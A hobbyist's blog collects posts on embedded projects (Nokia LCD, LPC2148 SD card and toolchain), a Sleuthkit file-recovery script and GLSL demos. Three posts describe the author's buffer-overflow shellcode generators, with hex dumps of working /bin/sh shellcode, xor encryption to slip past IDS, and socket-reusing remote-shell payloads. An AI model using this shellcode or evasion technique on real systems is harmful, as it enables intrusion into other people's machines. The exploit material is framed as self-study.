Got my Nokia 6100 LCD working. Long story of failures. First try was an LCD with an Epson controller from ebay for 10 Euros. But somehow someone failed to solder the SMD socket properly and it went away 😉 (thx max).

Next try was an Epson based LCD including a header board from sparkfun. But this time I wasn't able to run some demo code which was made for the LPC2138 on my LPC2148. I think the board was too fast to talk to the display. I wasn't able to set up SPI on the LPC2148 correctly. Need more investigation on that topic.

So I gave up at this point and decided to go for an ATmega16. I did a devel board for that which is loosely based on this schematic. The board uses simple parport ICSP and has a serial line for debugging and sending data.

Finally I threw some code together using the init commands found in this project. Added support for receiving images via UART and wrote a little Python client for sending images.

Future plans are to port the glcd lib to the Epson based LCD.


download source

Found an LPC2138 port of the Embedded Filesystems Library. Took this stuff and made it work on my LPC2148.

Now I can access an SD card attached to the LPC2148. Currently the FAT filesystem is supported. The sample program includes a minimal serial line shell which supports file reading and directory listings.

MMC/SD Card Filesystem Test (P:LPC2148 L:EFSL)
CARD init...spiInit for SSP/SPI1
Card is initialising.
CSD: 00 26 00 32 5F 59 83 C8 BE FB CF FF 92 40 40 D7
Drive Size is 1015808000 Bytes (1984000 Sectors)
Init done...
Press Command: d r a 
You pressed : d
Directory of 'root':
TEST01      ( 6 bytes )
TEST02      ( 6 bytes )
TEST03      ( 6 bytes )
TEST04      ( 6 bytes )
TEST05      ( 6 bytes )
TEST06      ( 6 bytes )
TEST09      ( 6 bytes )
TEST10      ( 6 bytes )
LOGDAT9 TXT ( 833 bytes )
DUMMY   LOG ( 2754 bytes )

download source

Just got my ARM LPC2148 Dev Board from Olimex

I put together a small overview of how to get things working using a Linux host system.

Toolchain

  • GNU Compiler Toolchain
  • Serial Programmer
  • Sample Code
      • Crt0
      • Linkerscript
      • Init Routine
      • Simple IO Test
      • SIO Debug Console

    GNU Compiler Toolchain

    I use a standard ARM GNU toolchain. Actually I found this binary download from mikrocontroller.net. But my GBA toolchain also worked and produced good binaries. So a Gentoo ARM crossdev should do the job. I think the LPC is not too picky about that.

    Serial Programmer

    I tried lpc21isp but it didn't work for me. So I ended up using lpc2k_pgm. It has a little GUI where you can set up all needed configs. I use the iHex format to upload to the dev board, where I had the best results using a quite slow serial speed like 9600 bps. You have to enable the BSL on the LPC2148 for ICSP. On my board the switch is called 'ICSP1' which needs to be set into the ON position.

    Crt0

    Nothing special about that. Took it from similar LPC based projects. It just sets up the stack sizes and the default IRQ vectors. Worked out of the box.

    Linkerscript

    Took this from another LPC project. The script specifies the memory layout of the target system and defines the sections for the binary output.

    Init Routine

    The code found in startup.c does the PLL init. The LPC2148 has a 12 MHz internal crystal but can run at up to 60 MHz when setting up the PLL. The default IRQ handlers are also defined here.
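    As an added example (not the board's startup.c or any code from the project above), the following host-side C computes the PLLCFG value the init routine has to program for a given crystal and target CCLK, applying the LPC2148 constraints from the user manual (M = CCLK/Fosc in 1..32, CCO = CCLK*2*P in 156..320 MHz, CCLK at most 60 MHz), plus the UART divisor the console setup needs; the function names are mine, and the target-side feed sequence is only compiled on ARM.

```c
#include <stdint.h>

/* LPC2148 PLL limits taken from the user manual. */
#define LPC_CCO_MIN   156000000UL   /* current-controlled oscillator, lower bound */
#define LPC_CCO_MAX   320000000UL   /* upper bound */
#define LPC_CCLK_MAX   60000000UL   /* maximum core clock */

/* Compute the PLLCFG register value for crystal fosc and target cclk.
 * Layout: bits 4:0 = MSEL (M - 1), bits 6:5 = PSEL (log2 of P).
 * Returns -1 when no legal (M, P) pair exists. */
int lpc2148_pllcfg(unsigned long fosc, unsigned long cclk)
{
    if (fosc == 0 || cclk > LPC_CCLK_MAX || cclk % fosc != 0) return -1;
    unsigned long m = cclk / fosc;          /* PLL multiplier M */
    if (m < 1 || m > 32) return -1;
    for (unsigned psel = 0; psel < 4; psel++) {
        unsigned long p = 1UL << psel;      /* P in {1, 2, 4, 8} */
        unsigned long fcco = cclk * 2 * p;  /* CCO frequency for this P */
        if (fcco >= LPC_CCO_MIN && fcco <= LPC_CCO_MAX)
            return (int)((psel << 5) | (unsigned)(m - 1));
    }
    return -1;
}

/* Divisor latch value for the UART: PCLK / (16 * baud). */
unsigned lpc2148_uart_divisor(unsigned long pclk, unsigned long baud)
{
    return (unsigned)(pclk / (16UL * baud));
}

#ifdef __arm__
/* Target-side programming sequence (register addresses from the LPC2148 manual). */
#define PLLCON  (*(volatile uint32_t *)0xE01FC080)
#define PLLCFG  (*(volatile uint32_t *)0xE01FC084)
#define PLLSTAT (*(volatile uint32_t *)0xE01FC088)
#define PLLFEED (*(volatile uint32_t *)0xE01FC08C)
#define PLL_FEED() do { PLLFEED = 0xAA; PLLFEED = 0x55; } while (0)
void lpc2148_pll_start(int cfg)
{
    PLLCFG = (uint32_t)cfg;  PLL_FEED();
    PLLCON = 1;              PLL_FEED();     /* PLLE: enable the PLL */
    while (!(PLLSTAT & (1u << 10))) ;        /* wait for PLOCK */
    PLLCON = 3;              PLL_FEED();     /* PLLE | PLLC: connect as CCLK */
}
#endif
```

    For 12 MHz in and 60 MHz out this yields M = 5 and P = 2 (CCO = 240 MHz), i.e. PLLCFG = 0x24.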

    Simple IO Test

    I used the on-board leds for a simple IO test.

    /* Simple IO test: blink the two on-board LEDs on P0.10 and P0.11 and
     * report every state change on the serial console. Initialize() and
     * ConsoleInit() come from startup.c and the SIO module of this project;
     * BAUD_RATE is the console speed configured there. */
    int main(void)
    {
        volatile unsigned int i;    /* volatile so the delay loops survive optimisation */
        Initialize();
        ConsoleInit(60000000 / (16 * BAUD_RATE));   /* divisor for a 60 MHz PCLK */
        puts("Init done\n");
        IODIR0 |= 1 << 10;          // P0.10 is an output
        IODIR0 |= 1 << 11;          // P0.11 is an output
        IOSET0 = 1 << 10;           // LED off
        IOSET0 = 1 << 11;           // LED off
    
        while (1) {
            for (i = 0; i < 1000000; i++);
            IOSET0 = 1 << 10;       // LED off
            IOCLR0 = 1 << 11;       // LED on
            puts("led1: off  led2: on\n");
            for (i = 0; i < 1000000; i++);
            IOCLR0 = 1 << 10;       // LED on
            IOSET0 = 1 << 11;       // LED off
            puts("led1: on   led2: off\n");
        }
    }

    SIO Debug Console

    Added a little module that uses one of the two serial lines for debugging output. I use the same serial port as for the ICSP, so after flashing lpc2k_pgm will display the output directly without any setup changes.


    download source

    For a PSP project I need to convert a font to a texture. Found a good working program here. But the current version seems to be no longer maintained. So I did some bugfixes and made it compile against current wxWidgets libs. I also added a new feature that writes the font face info to a C source file, which can be used directly in your project.


    Source

    Wrote a little Bash script using Sleuthkit tools to recover a deleted file from a partition. Tested the script with ext2 and fat32 filesystems.

    Setup a test image:

    dd  if=/dev/zero of=image  bs=1k count=8192
    mkfs.ext2 image
    mount -o loop image /mnt/image
    cp something /mnt/image
    rm /mnt/image/something
    sync
    umount /mnt/image

    Now you can start the script to find a token of the deleted file:

    ./find.sh image "Test"

    The Code for find.sh

    #!/bin/sh
    # Recover a deleted file from a filesystem image with Sleuthkit tools.
    # Note: Sleuthkit 3.x renamed dls/dcat/dcalc to blkls/blkcat/blkcalc.
     
    IMAGE=$1
    TOKEN=$2
    BSIZE=1024                      # filesystem block size in bytes
    TYPE="linux-ext2"               # filesystem type as known to Sleuthkit
    TMP="dls_$(date +%Y%m%d_%H%M%S)"
     
    if [ $# -ne 2 ]
    then
        echo "Usage: $0 image token"
        exit 1
    fi
     
    if [ ! -f "$IMAGE" ]
    then
      echo "Cannot find $IMAGE"
      exit 1
    fi
     
    if [ -z "$TOKEN" ]
    then
      echo "Please give search token"
      exit 1
    fi
     
    echo "--------------------------"
    echo "Found deleted"
    # list deleted directory entries recursively
    fls -f "$TYPE" -rd "$IMAGE"
    # collect all unallocated blocks of the image into one file
    dls -f "$TYPE" "$IMAGE" > "$TMP"
    # printable strings with their decimal byte offset in the dls output
    strings -t d "$TMP" > "$TMP.str"
    echo "--------------------------"
    grep -i "$TOKEN" "$TMP.str"
    echo "--------------------------"
    printf "Select Offset:"
    read n
    ADDR=$(grep -i "$TOKEN" "$TMP.str" | grep "$n" | sed 's/^[ \t]*//' | head -n 1 | cut -d " " -f1)
    if [ -z "$ADDR" ]
    then
        echo "Nothing found for '$TOKEN'"
        exit 1
    fi
    echo "Found $ADDR"
    # byte offset in the dls output -> unallocated unit number
    OFFSET=$(echo "$ADDR / $BSIZE" | bc)
    echo "Using Offset $OFFSET"
    # map the dls unit back to the real block address in the image
    BLOCK=$(dcalc -f "$TYPE" -u "$OFFSET" "$IMAGE")
    echo "Using Block $BLOCK"
    echo "----------------------------"
    dcat -f "$TYPE" "$IMAGE" "$BLOCK"
    echo
    echo "----------------------------"
    # find the (deleted) inode that still points at this block
    INODE=$(ifind -f "$TYPE" "$IMAGE" -d "$BLOCK")
    echo "Found Inode $INODE"
    istat -f "$TYPE" "$IMAGE" "$INODE"
    # the last line of the istat output lists the data blocks of the inode
    BLOCKS=$(istat -f "$TYPE" "$IMAGE" "$INODE" | tail -n 1)
    echo "---------------------------"
    echo "Found Blocks $BLOCKS"
    echo "---------------------------"
    # dump all blocks of the inode in order and save the result
    (for BLOCK in $BLOCKS
    do
       dcat -f "$TYPE" "$IMAGE" "$BLOCK"
    done) | tee "$TMP.found"
    echo "---------------------------"
    echo "Saved to $TMP.found"
    echo "---------------------------"
    rm -f "$TMP" "$TMP.str"

    Made a nice shellcode using the Python InlineEgg library. The shellcode is designed to smash the stack of a program which listens on a socket. The read buffer gets overflowed by the shellcode. The code was tested on an older SUSE 9.0, because current distros use PIE and SSP.

    Features:

    • Python script that generates the shellcode
    • Re-uses the listen socket of the victim and connects it to new shell
    • Scans for correct fd and peername
    • Embedded Telnet client which connects to created remote shell
    • Encoder to generate polymorphic shellcode

      Download

    Updated my shellcode generation tool. Added shellcode encryption to hide from IDS which scan for well known strings in the shellcode, like '/bin/sh'. The encryption is quite simple, just add, sub, xor or mov by a fixed offset. The tool also adds a hook to decode the shellcode before it gets called.

    Changelog:

    • Use getopt for command line parsing
    • Fixed off by one bug in hex dump output
    • Added simple shellcode encryption
    
    ./mkbuffer -m gen -l 256 -c xor -o 2 -f CODE -e CODE
    ------------------------------------------------------
    Start: 0x0x80499a0
    End:   0x0x80499c9
    Len:   0x0029 (41 bytes)
    jump:  0x00000000
    ------------------------------------------------------
    Crypt Shellcode 'xor' offset='2'
    ------------------------------------------------------
    0x0000:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
    0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
    0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
    0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
    0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
    0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
    0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
    0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
    0x0090:eb 11 5e 31 c9 b1 36 80 74 0e ff 02 80 e9 01 75
    0x0075:f6 eb 05 e8 ea ff ff ff 33 c2 b2 44 33 d9 33 cb
    0x00cb:cf 82 e9 12 59 33 c2 8a 41 05 52 51 8b e3 b2 09
    0x0009:33 d0 cf 82 ea e9 fd fd fd 2d 60 6b 6c 2d 71 6a
    0x006a:5a 92 92 92 57 8b e7 55 54 33 f4 51 ea 8c 90 90
    0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
    0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
    0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
    ------------------------------------------------------
    Writing Shellcode to 'CODE'
    ------------------------------------------------------
    Starting Subshell
    setup env $CODE
    ------------------------------------------------------

    Download

    Found some time to play with the GLSL extension. I started with a simple cube demo from NeHe using SDL for the user interface programming. Then I added GLEW as the GLSL extension wrapper. The shader programs are taken from a Linux Magazin article. Currently no own ideas 🙂 First I had to refresh my OpenGL basics. So I added some switches to trigger alpha blending and different textures.

    When running the demo you can press the following keys to trigger different effects:

    • 'l' toggles the light
    • 'b' enables alpha blending
    • 'f' steps through NEAREST, LINEAR and MIPMAP textures
    • 's' toggles the current shader program
    • 'n' switches to a different shader program

    Use the mouse and the left button to rotate the cube, the right button and mouse motion to zoom into the scene. The code was tested with a Nvidia GT6800 card. You'll need the Nvidia GL library, GLEW and SDL to build it from source.

    Screenshots (GLSL): Toonshading, Deformation, Mipmapped Texture

    Source

    Inspired by an article in the German Hakin9 magazine from October 2005, I wrote a little program to test and generate shellcode. A good place to learn about buffer overflows is here. I found an interesting Python framework called InlineEgg for shellcode generation. This makes shellcode development really easy and effective.

    My simple tool is used to prepare buffers with shellcode. The actual asm code is done with nasm and linked against a gcc main program. The program has three modes: dump, exec and gen.

    Dump does a hexdump of the plain shellcode, useful when tracing null bytes.

    For testing the functionality of the shellcode you can use exec, which simply calls the shellcode like a function.

    Gen is used to build a buffer with the actual shellcode. The code is hexdumped to stdout, the raw code is written to stderr and the environment variable $CODE is set. The target buffer size and the stack jump address also have to be passed to the program. The buffer is first filled with the jump address, then the first half is overwritten with NOPs. The shellcode gets copied to the middle of the buffer.

    
    ./mkbuffer gen 256  0x1234567
    Start: 0x0x8048bb0
    End:   0x0x8048bd9
    Len:   0x29 (41 bytes)
    jump:  0x1234567
    90
    0x0000:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
    0x0010:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
    0x0020:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
    0x0030:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
    0x0040:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
    0x0050:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
    0x0060:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
    0x0070:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 31
    0x0080:c0 b0 46 31 db 31 c9 cd 80 eb 10 5b 31 c0 88 43
    0x0090:07 50 53 89 e1 b0 0b 31 d2 cd 80 e8 eb ff ff ff
    0x00a0:2f 62 69 6e 2f 73 68 58 45 23 01 67 45 23 01 67
    0x00b0:45 23 01 67 45 23 01 67 45 23 01 67 45 23 01 67
    0x00c0:45 23 01 67 45 23 01 67 45 23 01 67 45 23 01 67
    0x00d0:45 23 01 67 45 23 01 67 45 23 01 67 45 23 01 67
    0x00e0:45 23 01 67 45 23 01 67 45 23 01 67 45 23 01 67
    0x00f0:45 23 01 67 45 23 01 67 45 23 01 67 45 23 01
    setup env $CODE

    Download

    A new Kbtsco release is available. Did some small tweaks.

    • Added channel forcing via the Configure menu. Some people reported having problems with the channel auto detection, so it's now possible to assign the channel manually.
    • Added a Cancel menu item to interrupt the connect process, in case somebody hits the Connect button when no headset is available.
    • Switched the build system from Autotools to bksys.

    Download